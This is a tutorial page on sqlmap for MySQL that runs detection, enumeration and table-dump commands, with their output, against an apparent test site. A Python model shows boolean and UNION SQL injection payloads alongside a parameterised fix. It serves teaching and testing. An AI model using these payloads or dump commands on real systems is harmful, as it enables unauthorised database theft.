
sqlmap for MySQL: Chinese help guide

程序员文章站 2022-03-19 10:25:04

 

Test whether an injection point exists (sqlmap probes every parameter in the URL, fingerprints the web stack and the back-end DBMS, and records what it finds under output/<target host>/ so later runs can reuse the session)

root@Dis9Team:/tools/sqlmap# ./sqlmap.py -u "http://pentest.dis9.com/sql/news.php?id=1" 

 

web application technology: PHP 5.2.6, Apache 2.2.9

back-end DBMS: MySQL 5.0.11

[16:42:09] [INFO] Fetched data logged to text files under '/tools/sqlmap/output/pentest.dis9.com'

 

[*] shutting down at: 16:42:09

 

root@Dis9Team:/tools/sqlmap#

 

List all database names (--dbs; -v 0 suppresses the progress messages so only the results are printed)

root@Dis9Team:/tools/sqlmap# ./sqlmap.py -u "http://pentest.dis9.com/sql/news.php?id=1" --dbs -v 0

 

web application technology: PHP 5.2.6, Apache 2.2.9

back-end DBMS: MySQL 5.0.11

[16:43:40] [INFO] read from file '/tools/sqlmap/output/pentest.dis9.com/session': information_schema, mysql, odldb, sql, test

available databases [5]:

[*] information_schema

[*] mysql

[*] odldb

[*] sql

[*] test

 

[*] shutting down at: 16:43:40

 

root@Dis9Team:/tools/sqlmap#

--users: list all DBMS user accounts (not database names; each entry is the account and the host it may connect from)

root@Dis9Team:/tools/sqlmap# ./sqlmap.py -u "http://pentest.dis9.com/sql/news.php?id=1" --users

 

    sqlmap/0.9 - automatic SQL injection and database takeover tool

 

http://sqlmap.sourceforge.net

 

database management system users [4]:

[*] 'root'@'127.0.0.1'

[*] 'root'@'localhost'

[*] 'root'@'production'

[*] 'sql'@'localhost'

Get all tables in a given database (-D <db> --tables)

root@Dis9Team:/tools/sqlmap# ./sqlmap.py -u "http://pentest.dis9.com/sql/news.php?id=1" -D odldb --tables

Database: odldb

[13 tables]

+--------------------------+

| wp_commentmeta           |

| wp_comments              |

| wp_eemail_newsletter     |

| wp_eemail_newsletter_sub |

| wp_links                 |

| wp_options               |

| wp_postmeta              |

| wp_posts                 |

| wp_term_relationships    |

| wp_term_taxonomy         |

| wp_terms                 |

| wp_usermeta              |

| wp_users                 |

+--------------------------+

Get the columns of a table in a database (-D <db> -T <table> --columns)

root@Dis9Team:/tools/sqlmap# ./sqlmap.py -u "http://pentest.dis9.com/sql/news.php?id=1" -D odldb -T wp_posts --columns

[16:47:54] [INFO] fetching columns for table 'wp_posts' on database 'odldb'

[16:47:54] [INFO] the SQL query used returns 23 entries

Database: odldb

Table: wp_posts

[23 columns]

+-----------------------+---------------------+

| Column                | Type                |

+-----------------------+---------------------+

| comment_count         | bigint(20)          |

| comment_status        | varchar(20)         |

| guid                  | varchar(255)        |

| ID                    | bigint(20) unsigned |

| menu_order            | int(11)             |

| ping_status           | varchar(20)         |

| pinged                | text                |

| post_author           | bigint(20) unsigned |

| post_content          | longtext            |

| post_content_filtered | text                |

| post_date             | datetime            |

| post_date_gmt         | datetime            |

| post_excerpt          | text                |

| post_mime_type        | varchar(100)        |

| post_modified         | datetime            |

| post_modified_gmt     | datetime            |

| post_name             | varchar(200)        |

| post_parent           | bigint(20) unsigned |

| post_password         | varchar(20)         |

| post_status           | varchar(20)         |

| post_title            | text                |

| post_type             | varchar(20)         |

| to_ping               | text                |

+-----------------------+---------------------+

Dump the full contents of a table (-D <db> -T <table> --dump; the rows are also written to a CSV file under the output directory):

root@Dis9Team:/tools/sqlmap# ./sqlmap.py -u "http://pentest.dis9.com/sql/news.php?id=1" -D odldb -T wp_links --dump

[16:50:27] [INFO] fetching columns for table 'wp_links' on database 'odldb'

[16:50:27] [INFO] the SQL query used returns 13 entries

[13 entries]

+------------------+---------+------------+--------------------+------------+------------+-------------+----------+----------+-------------+---------------------+---------------------------------------------------------+--------------+

| link_description | link_id | link_image | link_name          | link_notes | link_owner | link_rating | link_rel | link_rss | link_target | link_updated        | link_url                                                | link_visible |

+------------------+---------+------------+--------------------+------------+------------+-------------+----------+----------+-------------+---------------------+---------------------------------------------------------+--------------+

| NULL             | 15      | NULL       | brk@Dis9Team       | NULL       | 1          | 0           | NULL     | NULL     | NULL        | 0000-00-00 00:00:00 | http://www.dis9.com/.brk/                               | Y            |

| NULL             | 11      | NULL       | x1@Dis9Team        | NULL       | 1          | 0           | NULL     | NULL     | NULL        | 0000-00-00 00:00:00 | http://r0ck.org/                                        | Y            |

| NULL             | 14      | NULL       | ack@Dis9Team       | NULL       | 1          | 0           | NULL     | NULL     | NULL        | 0000-00-00 00:00:00 | http://x73.cc/                                          | Y            |

| NULL             | 18      | NULL       | ???                | NULL       | 1          | 0           | NULL     | NULL     | NULL        | 0000-00-00 00:00:00 | http://www.xiya.org/                                    | Y            |

| NULL             | 17      | NULL       | D.K@Dis9Team       | NULL       | 1          | 0           | NULL     | NULL     | NULL        | 0000-00-00 00:00:00 | http://www.crackerban.com/                              | Y            |

| NULL             | 10      | NULL       | 7h1nkz3r0@Dis9Team | NULL       | 1          | 0           | NULL     | NULL     | NULL        | 0000-00-00 00:00:00 | http://51root.net/                                      | Y            |

| NULL             | 9       | NULL       | LaTCue@Dis9Team    | NULL       | 1          | 0           | NULL     | NULL     | NULL        | 0000-00-00 00:00:00 | http://www.nzts.info/sex/                               | Y            |

| NULL             | 19      | NULL       | sys0p@Dis9Team     | NULL       | 1          | 0           | NULL     | NULL     | NULL        | 0000-00-00 00:00:00 | http://hi.baidu.com/%BA%CB%D0%C4web%B0%B2%C8%AB/blog/   | Y            |

| NULL             | 20      | NULL       | ?????              | NULL       | 1          | 0           | NULL     | NULL     | NULL        | 0000-00-00 00:00:00 | http://hi.baidu.com/%D0%DE%C1%B6%D6%D0%B5%C4%C1%F8/home | Y            |

| NULL             | 12      | NULL       | 4ngle@Dis9Team     | NULL       | 1          | 0           | NULL     | NULL     | NULL        | 0000-00-00 00:00:00 | http://www.bu9.org/                                     | Y            |

| NULL             | 13      | NULL       | Mario@Dis9Team     | NULL       | 1          | 0           | NULL     | NULL     | NULL        | 0000-00-00 00:00:00 | http://www.mario1990.com/                               | Y            |

| NULL             | 16      | NULL       | Vim0x0n@Dis9Team   | NULL       | 1          | 0           | NULL     | NULL     | NULL        | 0000-00-00 00:00:00 | http://www.91ri.org/                                    | Y            |

| NULL             | 8       | NULL       | Sackula@Dis9Team   | NULL       | 1          | 0           | NULL     | NULL     | NULL        | 0000-00-00 00:00:00 | http://blog.sackula.info/                               | Y            |

+------------------+---------+------------+--------------------+------------+------------+-------------+----------+----------+-------------+---------------------+---------------------------------------------------------+--------------+

Dump a single column's data (-C <column>; note the session file from the earlier run is reused, so the row count is not re-queried)

root@Dis9Team:/tools/sqlmap# ./sqlmap.py -u "http://pentest.dis9.com/sql/news.php?id=1" -D odldb -T wp_links -C link_url --dump

web application technology: PHP 5.2.6, Apache 2.2.9

back-end DBMS: MySQL 5.0.11

[17:23:48] [INFO] fetching columns 'link_url' entries for table 'wp_links' on database 'odldb'

[17:23:48] [INFO] read from file '/tools/sqlmap/output/pentest.dis9.com/session': 13

[17:23:48] [INFO] the SQL query used returns 13 entries

Database: odldb

Table: wp_links

[13 entries]

+---------------------------------------------------------+

| link_url                                                |

+---------------------------------------------------------+

| http://blog.sackula.info/                               |

| http://www.dis9.com/.brk/                               |

| http://www.mario1990.com/                               |

| http://www.91ri.org/                                    |

| http://hi.baidu.com/%D0%DE%C1%B6%D6%D0%B5%C4%C1%F8/home |

| http://x73.cc/                                          |

| http://51root.net/                                      |

| http://www.crackerban.com/                              |

| http://www.nzts.info/sex/                               |

| http://r0ck.org/                                        |

| http://www.xiya.org/                                    |

| http://hi.baidu.com/%BA%CB%D0%C4web%B0%B2%C8%AB/blog/   |

| http://www.bu9.org/                                     |

+---------------------------------------------------------+

 

[17:23:48] [INFO] Table 'odldb.wp_links' dumped to CSV file '/tools/sqlmap/output/pentest.dis9.com/dump/odldb/wp_links.csv'

[17:23:48] [INFO] Fetched data logged to text files under '/tools/sqlmap/output/pentest.dis9.com'

 

[*] shutting down at: 17:23:48

Dump all data in a database (--dump with -D but no -T walks every table)

root@Dis9Team:/tools/sqlmap# ./sqlmap.py -u "http://pentest.dis9.com/sql/news.php?id=1" --dump -D odldb

Set the number of threads (--threads N speeds up blind/inference extraction at the cost of noisier traffic against the target; sqlmap rejects values above its built-in maximum of 10)
root@Dis9Team:/tools/sqlmap# ./sqlmap.py -u "http://pentest.dis9.com/sql/news.php?id=1" -D odldb -T wp_links -C link_url --dump --threads 10
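The commands above show what sqlmap reports, not what it sends. The following is an added example, not code from the original article or from sqlmap: a miniature model of the news.php?id=1 endpoint, backed by an in-memory SQLite database instead of MySQL so it runs offline (sqlite_master and pragma_table_info() stand in for information_schema.tables and information_schema.columns). It shows the two mechanisms behind the whole workflow, boolean-based detection and UNION-based enumeration of tables, columns and rows, run against a concatenating handler and against a hardened one. The table and column names (wp_links.link_url) mirror the article; the rows and the news table are constructed sample data.

```python
"""Constructed model of the news.php?id=1 endpoint attacked in the article.

Added example, not code from the original article or from sqlmap. MySQL is
replaced by an in-memory SQLite database so it runs offline; the catalog
sources differ from MySQL's information_schema but the injection mechanics
are the same.
"""
import re
import sqlite3


def make_db():
    """Constructed sample schema: a news table for the vulnerable page and a
    wp_links table with two rows whose names mirror the article."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE news(id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO news VALUES (1, 'first post'), (2, 'second post');
        CREATE TABLE wp_links(link_id INTEGER, link_name TEXT, link_url TEXT);
        INSERT INTO wp_links VALUES
            (8,  'Sackula@Dis9Team', 'http://blog.sackula.info/'),
            (15, 'brk@Dis9Team',     'http://www.dis9.com/.brk/');
    """)
    return con


def news_vulnerable(con, id_param):
    """The bug sqlmap exploits: the id parameter is concatenated into the SQL text."""
    sql = "SELECT id, title FROM news WHERE id = " + id_param
    return [title for _, title in con.execute(sql).fetchall()]


def news_fixed(con, id_param):
    """Hardened handler: validate the type first, then bind the value as a parameter."""
    if not re.fullmatch(r"[0-9]+", id_param):
        raise ValueError("id must be a non-negative integer")
    sql = "SELECT id, title FROM news WHERE id = ?"
    return [title for _, title in con.execute(sql, (int(id_param),)).fetchall()]


def fetch(handler, con, payload):
    """Simulate one HTTP request; an application or DB error is an 'error page' (None)."""
    try:
        return handler(con, payload)
    except (ValueError, sqlite3.Error):
        return None


def boolean_detect(handler, con):
    """First thing sqlmap's detection phase tries: a known-true and a known-false
    tautology must behave differently, and the true one must match the untouched page."""
    baseline = fetch(handler, con, "1")
    page_true = fetch(handler, con, "1 AND 1=1")
    page_false = fetch(handler, con, "1 AND 1=2")
    return page_true == baseline and page_false is not None and page_false != baseline


def union_query(handler, con, expr, source):
    """The UNION technique behind --tables/--columns/--dump: pad with NULL to the
    original column count (2 here; sqlmap finds it by ORDER BY / NULL probing) and
    route the wanted expression through a column the page displays."""
    rows = fetch(handler, con, f"0 UNION SELECT NULL, {expr} FROM {source}")
    return None if rows is None else sorted(rows)


# Catalog sources for this SQLite model. On MySQL these would be
# information_schema.tables and information_schema.columns WHERE table_name='...'.
TABLES = "sqlite_master WHERE type='table'"


def columns_of(table):
    return f"pragma_table_info('{table}')"


if __name__ == "__main__":
    db = make_db()
    print("injectable:", boolean_detect(news_vulnerable, db))
    print("tables:", union_query(news_vulnerable, db, "name", TABLES))
    print("columns:", union_query(news_vulnerable, db, "name", columns_of("wp_links")))
    print("link_url:", union_query(news_vulnerable, db, "link_url", "wp_links"))
    print("fixed handler injectable:", boolean_detect(news_fixed, db))
```

Run it as a script: the concatenating handler is flagged by the boolean probe and yields its table list, the wp_links column list and the link_url values through the UNION payloads, exactly the sequence --dbs/--tables/--columns/--dump automates, while the parameterised handler turns every payload into an error page and is not flagged.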

 

Excerpted from http://www.dis9.com/papers/sqlmap-for-mysql-chinese-help-guide.html